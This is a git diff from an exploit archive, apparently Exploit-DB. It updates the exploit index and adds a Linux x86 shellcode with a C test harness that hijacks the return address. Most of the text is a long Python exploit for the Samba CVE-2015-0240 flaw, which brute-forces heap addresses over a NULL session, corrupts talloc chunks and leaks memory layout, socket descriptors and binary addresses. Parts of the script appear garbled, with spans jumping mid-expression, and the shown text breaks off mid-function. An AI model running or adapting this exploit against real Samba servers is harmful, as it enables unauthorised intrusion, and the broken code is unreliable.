diff --git a/files.csv b/files.csv index f45fee53c..fd5f88fd6 100755 --- a/files.csv +++ b/files.csv @@ -15008,7 +15008,7 @@ id,file,description,date,author,platform,type,port 17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS <= 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow",2011-05-16,metasploit,windows,remote,0 17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection Vulnerability",2011-05-17,Null-0x00,php,webapps,0 17302,platforms/windows/local/17302.py,"Sonique 1.96 - (.m3u) Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0 -17303,platforms/php/webapps/17303.txt,"Joomla 1.0 Component jDownloads Arbitrary File Upload Vulnerability",2011-05-18,Al-Ghamdi,php,webapps,0 +17303,platforms/php/webapps/17303.txt,"Joomla 1.0 - Component jDownloads Arbitrary File Upload Vulnerability",2011-05-18,Al-Ghamdi,php,webapps,0 17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0 17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - ""nsiproxy.sys"" Local Kernel DoS Exploit",2011-05-18,"Lufeng Li",windows,dos,0 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0 @@ -32972,13 +32972,10 @@ id,file,description,date,author,platform,type,port 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 36554,platforms/php/webapps/36554.txt,"Wordpress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0 -36555,platforms/windows/local/36555.c,"BZR Player 1.03 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 -36556,platforms/windows/local/36556.c,"ZIP Password Recovery Professional 7.1 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 -36557,platforms/windows/local/36557.txt,"HTTrack Website Copier 3.48-21 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 -36558,platforms/windows/local/36558.txt,"UltraISO 9.6.2.3059 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 36559,platforms/php/webapps/36559.txt,"Wordpress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0 +36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitary Code Execution",2015-03-30,"Akhil Das",linux,remote,0 36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0 36564,platforms/linux/local/36564.txt,"Fedora 21 - setroubleshootd Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0 36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 @@ -32991,6 +32988,7 @@ id,file,description,date,author,platform,type,port 36572,platforms/php/webapps/36572.txt,"Toner Cart 'show_series_ink.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0 36573,platforms/php/webapps/36573.txt,"MMORPG Zone 'view_news.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0 36574,platforms/php/webapps/36574.txt,"Freelance Zone 'show_code.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0 +36575,platforms/multiple/webapps/36575.py,"JBoss AS versions 3, 4, 5, 6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0 36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0 36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0 36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,metasploit,windows,remote,0 @@ -33023,6 +33021,7 @@ id,file,description,date,author,platform,type,port 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80 36610,platforms/php/webapps/36610.txt,"Wordpress Video Gallery Plugin 2.8 - Multiple CSRF Vulnerabilities",2015-04-02,Divya,php,webapps,80 +36611,platforms/php/webapps/36611.txt,"Multiple UpThemes WordPress Themes - Arbitrary File Upload",2015-04-02,Divya,php,webapps,80 36612,platforms/php/webapps/36612.txt,"Wordpress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80 36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80 36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80 @@ -33049,6 +33048,8 @@ id,file,description,date,author,platform,type,port 36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0 36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component 'catid' Parameter Remote SQL Injection Vulnerability",2012-01-31,the_cyber_nuxbie,php,webapps,0 36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component 'id' Parameter Remote SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0 +36640,platforms/php/webapps/36640.txt,"WordPress Work The Flow File Upload 2.5.2 - Arbitrary File Upload Vulnerability",2015-04-05,"Claudio Viviani",php,webapps,0 +36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0 36642,platforms/php/webapps/36642.txt,"Joomla! 'com_bbs' Component Multiple Remote SQL Injection Vulnerabilities",2012-01-30,the_cyber_nuxbie,php,webapps,0 36643,platforms/php/webapps/36643.txt,"4images 1.7.10 admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0 36644,platforms/php/webapps/36644.txt,"4images 1.7.10 admin/categories.php cat_parent_id Parameter XSS",2012-01-31,RandomStorm,php,webapps,0 @@ -33098,7 +33099,8 @@ id,file,description,date,author,platform,type,port 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h 'path_to_admin/product.php' Cross Site Request Forgery Vulnerability",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root",2015-04-09,xort,linux,remote,8000 -36692,platforms/osx/local/36692.py,"Mac OS X rootpipe Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 +36691,platforms/php/webapps/36691.txt,"Wordpress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 +36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5, 10.8.2, 10.9.5 10.10.2 - rootpipe Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 SQL Injection and Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0 36695,platforms/php/webapps/36695.txt,"Zimbra 'view' Parameter Cross Site Scripting Vulnerability",2012-02-13,sonyy,php,webapps,0 @@ -33106,7 +33108,7 @@ id,file,description,date,author,platform,type,port 36697,platforms/php/webapps/36697.txt,"Nova CMS optimizer/index.php fileType Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36698,platforms/php/webapps/36698.txt,"Nova CMS includes/function/gets.php filename Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36699,platforms/php/webapps/36699.txt,"Nova CMS includes/function/usertpl.php conf[blockfile] Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36700,platforms/windows/local/36700.txt,"Elipse SCADA 2.29 b141 - DLL Hijacking",2015-04-10,"PETER CHENG",windows,local,0 +36701,platforms/lin_x86/shellcode/36701.c,"Create 'my.txt' Working Directory (37 Bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0 36702,platforms/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_db_setup.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36703,platforms/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36704,platforms/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_display.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 @@ -33138,3 +33140,11 @@ id,file,description,date,author,platform,type,port 36730,platforms/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_iplink.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ports.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36733,platforms/php/webapps/36733.txt,"Wordpress Plugin 'WP Mobile Edition' 2.7 - Remote File Disclosure Vulnerability",2015-04-13,"Khwanchai Kaewyos",php,webapps,0 +36735,platforms/php/webapps/36735.txt,"Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0 +36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0 +36738,platforms/php/webapps/36738.txt,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload Vulnerability",2015-04-13,"Claudio Viviani",php,webapps,0 +36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0 +36743,platforms/linux/dos/36743.c,"Linux Kernel splice() System Call - Local DoS",2015-04-13,"Emeric Nasi",linux,dos,0 +36744,platforms/windows/remote/36744.rb,"Adobe Flash Player casi32 Integer Overflow",2015-04-13,metasploit,windows,remote,0 +36745,platforms/osx/local/36745.rb,"Mac OS X ""Rootpipe"" Privilege Escalation",2015-04-13,metasploit,osx,local,0 diff --git a/platforms/lin_x86/shellcode/36701.c b/platforms/lin_x86/shellcode/36701.c new file mode 100755 index 000000000..1af9bed15 --- /dev/null +++ b/platforms/lin_x86/shellcode/36701.c @@ -0,0 +1,58 @@ +/* +#Title: Create 'my.txt' in present working directory of vulnerable software +#Length: 37 bytes +#Date: 3 April 2015 +#Author: Mohammad Reza Ramezani (mr.ramezani.edu [at] gmail com - g+) +#Tested On: kali-linux-1.0.6-i386 + + + + +Section .text +global _start + +_start: +push byte 8 +pop eax +jmp short GoToCall +shellcode: +pop ebx +xor edx, edx +mov [ebx + 6], dl +push word 0544o +pop ecx +int 0x80 + +push byte 1 +pop eax +xor ebx, ebx +int 0x80 + + +GoToCall: +call shellcode +db 'my.txtX' + + +This shellcode can generalized by using of absolute path instead of 'my.txt' +*/ + +char shellcode[] = "\x6a\x08\x58\xeb\x14\x5b\x31\xd2" +"\x88\x53\x06\x66\x68\x64\x01\x59\xcd\x80\x6a\x01\x58" +"\x31\xdb\xcd\x80\xe8\xe7\xff\xff\xff\x6d\x79\x2e\x74" +"\x78\x74\x58"; + +int main() +{ + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} + + +int main() +{ + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} diff --git a/platforms/linux/dos/36741.py b/platforms/linux/dos/36741.py new file mode 100755 index 000000000..f1b40e3ac --- /dev/null +++ b/platforms/linux/dos/36741.py @@ -0,0 +1,911 @@ +#!/usr/bin/python +""" +Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya + +The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by +ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' +in libtalloc does not write a value on 'creds' address. + +Reference: +- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ + +Note: +- heap might be changed while running exploit, need to try again (with '-hs' or '-pa' option) + if something failed + +Find heap address: +- ubuntu PIE heap start range: b7700000 - b9800000 +- start payload size: the bigger it is the lesser connection and binding time. + but need more time to shrink payload size +- payload is too big to fit in freed small hole. so payload is always at end + of heap +- start bruteforcing heap address from high memory address to low memory address + to prevent 'creds' pointed to real heap chunk (also no crash but not our payload) + +Leak info: +- heap layout is predictable because talloc_stackframe_pool(8192) is called after + accepted connection and fork but before calling smbd_server_connection_loop_once() +- before talloc_stackframe_pool(8192) is called, there are many holes in heap + but their size are <8K. so pool is at the end of heap at this time +- many data that allocated after talloc_stackframe_pool(8192) are allocated in pool. + with the same pattern of request, the layout in pool are always the same. +- many data are not allocated in pool but fit in free holes. so no small size data are + allocated after pool. +- normally there are only few data block allocated after pool. + - pool size: 0x2048 (included glibc heap header 4 bytes) + - a table that created in giconv_open(). the size is 0x7f88 (included glibc heap header 4 bytes) + - p->in_data.pdu.data. the size is 0x10e8 (included glibc heap header 4 bytes) + - this might not be allocated here because its size might fit in freed hole + - all fragment should be same size to prevent talloc_realloc() changed pdu.data size + - so last fragment should be padded + - ndr DATA_BLOB. the size is 0x10d0 (included glibc heap header 4 bytes) + - this might not be allocated here because its size might fit in freed hole + - p->in_data.data.data. the size is our netlogon data + - for 8K payload, the size is 0x2168 (included glibc heap header 4 bytes) + - this data is allocated by realloc(), grew by each fragment. so this memory + block is not allocated by mmapped even the size is very big. +- pool layout for interested data + - r->out offset from pool (talloc header) is 0x13c0 + - r->out.return_authenticator offset from pool is 0x13c0+0x18 + - overwrite this (with link unlink) to leak info in ServerPasswordSet response + - smb_request offset from pool (talloc header) is 0x11a0 + - smb_request.sconn offset from pool is 0x11a0+0x3c + - socket fd is at smb_request.sconn address (first struct member) +- more shared folder in configuration, more freed heap holes + - only if there is no or one shared, many data might be unexpected allocated after pool. + have to get that extra offset or bruteforce it + + +More exploitation detail in code (comment) ;) +""" + +import sys +import time +from struct import pack,unpack +import argparse + +import impacket +from impacket.dcerpc.v5 import transport, nrpc +from impacket.dcerpc.v5.ndr import NDRCALL +from impacket.dcerpc.v5.dtypes import WSTR + + +class Requester: + """ + put all smb request stuff into class. help my editor folding them + """ + + # impacket does not implement NetrServerPasswordSet + # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6) + class NetrServerPasswordSet(NDRCALL): + opnum = 6 + structure = ( + ('PrimaryName',nrpc.PLOGONSRV_HANDLE), + ('AccountName',WSTR), + ('SecureChannelType',nrpc.NETLOGON_SECURE_CHANNEL_TYPE), + ('ComputerName',WSTR), + ('Authenticator',nrpc.NETLOGON_AUTHENTICATOR), + ('UasNewPassword',nrpc.ENCRYPTED_NT_OWF_PASSWORD), + ) + # response is authenticator (8 bytes) and error code (4 bytes) + + # size of each field in sent packet + req_server_handle_size = 16 + req_username_hdr_size = 4 + 4 + 4 + 2 # max count, offset, actual count, trailing null + req_sec_type_size = 2 + req_computer_size = 4 + 4 + 4 + 2 + req_authenticator_size = 8 + 2 + 4 + req_new_pwd_size = 16 + req_presize = req_server_handle_size + req_username_hdr_size + req_sec_type_size + req_computer_size + req_authenticator_size + req_new_pwd_size + + samba_rpc_fragment_size = 4280 + netlogon_data_fragment_size = samba_rpc_fragment_size - 8 - 24 # 24 is dcerpc header size + + def __init__(self): + self.target = None + self.dce = None + + sessionKey = '\x00'*16 + # prepare ServerPasswordSet request + authenticator = nrpc.NETLOGON_AUTHENTICATOR() + authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey) + authenticator['Timestamp'] = 10 + + uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD() + uasNewPass['Data'] = '\x00'*16 + + self.serverName = nrpc.PLOGONSRV_HANDLE() + # ReferentID field of PrimaryName controls the uninitialized value of creds + self.serverName.fields['ReferentID'] = 0 + + self.accountName = WSTR() + + request = Requester.NetrServerPasswordSet() + request['PrimaryName'] = self.serverName + request['AccountName'] = self.accountName + request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel + request['ComputerName'] = '\x00' + request['Authenticator'] = authenticator + request['UasNewPassword'] = uasNewPass + self.request = request + + def set_target(self, target): + self.target = target + + def set_payload(self, s, pad_to_size=0): + if pad_to_size > 0: + s += '\x00'*(pad_to_size-len(s)) + pad_size = 0 + if len(s) < (16*1024+1): + ofsize = (len(s)+self.req_presize) % self.netlogon_data_fragment_size + if ofsize > 0: + pad_size = self.netlogon_data_fragment_size - ofsize + + self.accountName.fields['Data'] = s+'\x00'*pad_size+'\x00\x00' + self.accountName.fields['MaximumCount'] = None + self.accountName.fields['ActualCount'] = None + self.accountName.data = None # force recompute + + set_accountNameData = set_payload + + def get_dce(self): + if self.dce is None or self.dce.lostconn: + rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\PIPE\netlogon]' % self.target) + rpctransport.set_credentials('','') # NULL session + rpctransport.set_dport(445) + # force to 'NT LM 0.12' only + rpctransport.preferred_dialect('NT LM 0.12') + + self.dce = rpctransport.get_dce_rpc() + self.dce.connect() + self.dce.bind(nrpc.MSRPC_UUID_NRPC) + self.dce.lostconn = False + return self.dce + + def get_socket(self): + return self.dce.get_rpc_transport().get_socket() + + def force_dce_disconnect(self): + if not (self.dce is None or self.dce.lostconn): + self.get_socket().close() + self.dce.lostconn = True + + def request_addr(self, addr): + self.serverName.fields['ReferentID'] = addr + + dce = self.get_dce() + try: + dce.call(self.request.opnum, self.request) + answer = dce.recv() + return unpack("flags & TALLOC_FLAG_LOOP)) { + /* we have a free loop - stop looping */ + return 0; + } + """ + global fake_chunk_find_heap + payload = fake_chunk_find_heap*(payload_size/len(fake_chunk_find_heap)) + set_payload(payload) + addr_step = payload_size + addr = start_addr + i = 0 + while addr > stop_addr: + if i == 16: + print(" [*]trying addr: {:x}".format(addr)) + i = 0 + + if request_check_valid_addr(addr): + return addr + if first: + # first time, the last 16 bit is still do not know + # have to do extra check + if request_check_valid_addr(addr+0x10): + return addr+0x10 + addr -= addr_step + i += 1 + return None + +def find_valid_heap_exact_addr(addr, payload_size): + global fake_chunk_find_heap + fake_size = payload_size // 2 + while fake_size >= len(fake_chunk_find_heap): + payload = fake_chunk_find_heap*(fake_size/len(fake_chunk_find_heap)) + set_payload(payload, payload_size) + if not request_check_valid_addr(addr): + addr -= fake_size + fake_size = fake_size // 2 + + set_payload('\x00'*16 + pack("= target_payload_size: + force_dce_disconnect() + found_addr = None + for i in range(3): + found_addr = find_valid_heap_addr(start_addr, stop_addr, payload_size, good_addr is None) + if found_addr is not None: + break + if found_addr is None: + # failed + good_addr = None + break + good_addr = found_addr + print(" [*] found valid addr ({:d}KB): {:x}".format(payload_size//1024, good_addr)) + start_addr = good_addr + stop_addr = good_addr - payload_size + 0x20 + payload_size //= 2 + + if good_addr is not None: + # try 3 times to find exact address. if address cannot be found, assume + # minimizing payload size is not correct. start minimizing again + for i in range(3): + heap_addr = find_valid_heap_exact_addr(good_addr, target_payload_size) + if heap_addr != 0: + break + force_dce_disconnect() + + if heap_addr == 0: + print(' [-] failed to find payload adress') + # start from last good address + some offset + start_addr = (good_addr + 0x10000) & 0xffff0000 + print('[*] bruteforcing heap adress again from {:x}'.format(start_addr)) + + payload_addr = heap_addr - len(fake_chunk_find_heap) + print(" [+] found payload addr: {:x}".format(payload_addr)) + return payload_addr + + +######## +# leak info +######## + +def addr2utf_prefix(addr): + def is_badchar(v): + return (v >= 0xd8) and (v <= 0xdf) + + prefix = 0 # safe + if is_badchar((addr)&0xff) or is_badchar((addr>>16)&0xff): + prefix |= 2 # cannot have prefix + if is_badchar((addr>>8)&0xff) or is_badchar((addr>>24)&0xff): + prefix |= 1 # must have prefix + return prefix + +def leak_info_unlink(payload_addr, next_addr, prev_addr, retry=True, call_only=False): + """ + Note: + - if next_addr and prev_addr are not zero, they must be writable address + because of below code in _talloc_free_internal() + if (tc->prev) tc->prev->next = tc->next; + if (tc->next) tc->next->prev = tc->prev; + """ + # Note: U+D800 to U+DFFF is reserved (also bad char for samba) + # check if '\x00' is needed to avoid utf16 badchar + prefix_len = addr2utf_prefix(next_addr) | addr2utf_prefix(prev_addr) + if prefix_len == 3: + return None # cannot avoid badchar + if prefix_len == 2: + prefix_len = 0 + + fake_chunk_leak_info = pack(" wrong answer + force_dce_disconnect() # heap is corrupted, disconnect it + + return answers + +def leak_info_addr(payload_addr, r_out_addr, leak_addr, retry=True): + # leak by replace r->out.return_authenticator pointer + # Note: because leak_addr[4:8] will be replaced with r_out_addr + # only answers[0] and answers[2] are leaked + return leak_info_unlink(payload_addr, leak_addr, r_out_addr, retry) + +def leak_info_addr2(payload_addr, r_out_addr, leak_addr, retry=True): + # leak by replace r->out.return_authenticator pointer + # Note: leak_addr[0:4] will be replaced with r_out_addr + # only answers[1] and answers[2] are leaked + return leak_info_unlink(payload_addr, r_out_addr-4, leak_addr-4, retry) + +def leak_uint8t_addr(payload_addr, r_out_addr, chunk_addr): + # leak name field ('uint8_t') in found heap chunk + # do not retry this leak, because r_out_addr is guessed + answers = leak_info_addr(payload_addr, r_out_addr, chunk_addr + 0x18, False) + if answers is None: + return None + if answers[2] != TALLOC_MAGIC: + force_dce_disconnect() + return None + + return answers[0] + +def leak_info_find_offset(info): + # offset from pool to payload still does not know + print("[*] guessing 'r' offset and leaking 'uint8_t' address ...") + chunk_addr = info['chunk_addr'] + uint8t_addr = None + r_addr = None + r_out_addr = None + while uint8t_addr is None: + # 0x8c10 <= 4 + 0x7f88 + 0x2044 - 0x13c0 + # 0x9ce0 <= 4 + 0x7f88 + 0x10d0 + 0x2044 - 0x13c0 + # 0xadc8 <= 4 + 0x7f88 + 0x10e8 + 0x10d0 + 0x2044 - 0x13c0 + # 0xad40 is extra offset when no share on debian + # 0x10d38 is extra offset when only [printers] is shared on debian + for offset in (0x8c10, 0x9ce0, 0xadc8, 0xad40, 0x10d38): + r_addr = chunk_addr - offset + # 0x18 is out.authenticator offset + r_out_addr = r_addr + 0x18 + print(" [*] try 'r' offset 0x{:x}, r_out addr: 0x{:x}".format(offset, r_out_addr)) + + uint8t_addr = leak_uint8t_addr(info['payload_addr'], r_out_addr, chunk_addr) + if uint8t_addr is not None: + print(" [*] success") + break + print(" [-] failed") + if uint8t_addr is None: + return False + + info['uint8t_addr'] = uint8t_addr + info['r_addr'] = r_addr + info['r_out_addr'] = r_out_addr + info['pool_addr'] = r_addr - 0x13c0 + + print(" [+] text 'uint8_t' addr: {:x}".format(info['uint8t_addr'])) + print(" [+] pool addr: {:x}".format(info['pool_addr'])) + + return True + +def leak_sock_fd(info): + # leak sock fd from + # smb_request->sconn->sock + # (offset: ->0x3c ->0x0 ) + print("[*] leaking socket fd ...") + info['smb_request_addr'] = info['pool_addr']+0x11a0 + print(" [*] smb request addr: {:x}".format(info['smb_request_addr'])) + answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr']+0x3c-4) + if answers is None: + print(' [-] cannot leak sconn_addr address :(') + return None + force_dce_disconnect() # heap is corrupted, disconnect it + sconn_addr = answers[2] + info['sconn_addr'] = sconn_addr + print(' [+] sconn addr: {:x}'.format(sconn_addr)) + + # write in padding of chunk, no need to disconnect + answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], sconn_addr) + if answers is None: + print('cannot leak sock_fd address :(') + return None + sock_fd = answers[1] + print(' [+] sock fd: {:d}'.format(sock_fd)) + info['sock_fd'] = sock_fd + return sock_fd + +def leak_talloc_pop_addr(info): + # leak destructor talloc_pop() address + # overwrite name field, no need to disconnect + print('[*] leaking talloc_pop address') + answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], info['pool_addr'] + 0x14) + if answers is None: + print(' [-] cannot leak talloc_pop() address :(') + return None + if answers[2] != 0x2010: # chunk size must be 0x2010 + print(' [-] cannot leak talloc_pop() address. answers[2] is wrong :(') + return None + talloc_pop_addr = answers[0] + print(' [+] talloc_pop addr: {:x}'.format(talloc_pop_addr)) + info['talloc_pop_addr'] = talloc_pop_addr + return talloc_pop_addr + +def leak_smbd_server_connection_handler_addr(info): + # leak address from + # smbd_server_connection.smb1->fde ->handler + # (offset: ->0x9c->0x14 ) + # MUST NOT disconnect after getting smb1_fd_event address + print('[*] leaking smbd_server_connection_handler address') + def real_leak_conn_handler_addr(info): + answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['sconn_addr'] + 0x9c) + if answers is None: + print(' [-] cannot leak smb1_fd_event address :(') + return None + smb1_fd_event_addr = answers[1] + print(' [*] smb1_fd_event addr: {:x}'.format(smb1_fd_event_addr)) + + answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], smb1_fd_event_addr+0x14) + if answers is None: + print(' [-] cannot leak smbd_server_connection_handler address :(') + return None + force_dce_disconnect() # heap is corrupted, disconnect it + smbd_server_connection_handler_addr = answers[0] + diff = info['talloc_pop_addr'] - smbd_server_connection_handler_addr + if diff > 0x2000000 or diff < 0: + print(' [-] get wrong smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr)) + smbd_server_connection_handler_addr = None + return smbd_server_connection_handler_addr + + smbd_server_connection_handler_addr = None + while smbd_server_connection_handler_addr is None: + smbd_server_connection_handler_addr = real_leak_conn_handler_addr(info) + + print(' [+] smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr)) + info['smbd_server_connection_handler_addr'] = smbd_server_connection_handler_addr + + return smbd_server_connection_handler_addr + +def find_smbd_base_addr(info): + # estimate smbd_addr from talloc_pop + if (info['talloc_pop_addr'] & 0xf) != 0 or (info['smbd_server_connection_handler_addr'] & 0xf) != 0: + # code has no alignment + start_addr = info['smbd_server_connection_handler_addr'] - 0x124000 + else: + start_addr = info['smbd_server_connection_handler_addr'] - 0x130000 + start_addr = start_addr & 0xfffff000 + stop_addr = start_addr - 0x20000 + + print('[*] finding smbd loaded addr ...') + while True: + smbd_addr = start_addr + while smbd_addr >= stop_addr: + if addr2utf_prefix(smbd_addr-8) == 3: + # smbd_addr is 0xb?d?e000 + test_addr = smbd_addr - 0x800 - 4 + else: + test_addr = smbd_addr - 8 + # test writable on test_addr + answers = leak_info_addr(info['payload_addr'], 0, test_addr, retry=False) + if answers is not None: + break + smbd_addr -= 0x1000 # try prev page + if smbd_addr > stop_addr: + break + print(' [-] failed. try again.') + + info['smbd_addr'] = smbd_addr + print(' [+] found smbd loaded addr: {:x}'.format(smbd_addr)) + +def dump_mem_call_addr(info, target_addr): + # leak pipes_struct address from + # smbd_server_connection->chain_fsp->fake_file_handle->private_data + # (offset: ->0x48 ->0xd4 ->0x4 ) + # Note: + # - MUST NOT disconnect because chain_fsp,fake_file_handle,pipes_struct address will be changed + # - target_addr will be replaced with current_pdu_sent address + # check read_from_internal_pipe() in source3/rpc_server/srv_pipe_hnd.c + print(' [*] overwrite current_pdu_sent for dumping memory ...') + answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr'] + 0x48) + if answers is None: + print(' [-] cannot leak chain_fsp address :(') + return False + chain_fsp_addr = answers[1] + print(' [*] chain_fsp addr: {:x}'.format(chain_fsp_addr)) + + answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], chain_fsp_addr+0xd4, retry=False) + if answers is None: + print(' [-] cannot leak fake_file_handle address :(') + return False + fake_file_handle_addr = answers[0] + print(' [*] fake_file_handle addr: {:x}'.format(fake_file_handle_addr)) + + answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], fake_file_handle_addr+0x4-0x4, retry=False) + if answers is None: + print(' [-] cannot leak pipes_struct address :(') + return False + pipes_struct_addr = answers[2] + print(' [*] pipes_struct addr: {:x}'.format(pipes_struct_addr)) + + current_pdu_sent_addr = pipes_struct_addr+0x84 + print(' [*] current_pdu_sent addr: {:x}'.format(current_pdu_sent_addr)) + # change pipes->out_data.current_pdu_sent to dump memory + return leak_info_unlink(info['payload_addr'], current_pdu_sent_addr-4, target_addr, call_only=True) + +def dump_smbd_find_bininfo(info): + def recv_till_string(data, s): + pos = len(data) + while True: + data += force_recv() + if len(data) == pos: + print('no more data !!!') + return None + p = data.find(s, pos-len(s)) + if p != -1: + return (data, p) + pos = len(data) + return None + + def lookup_dynsym(dynsym, name_offset): + 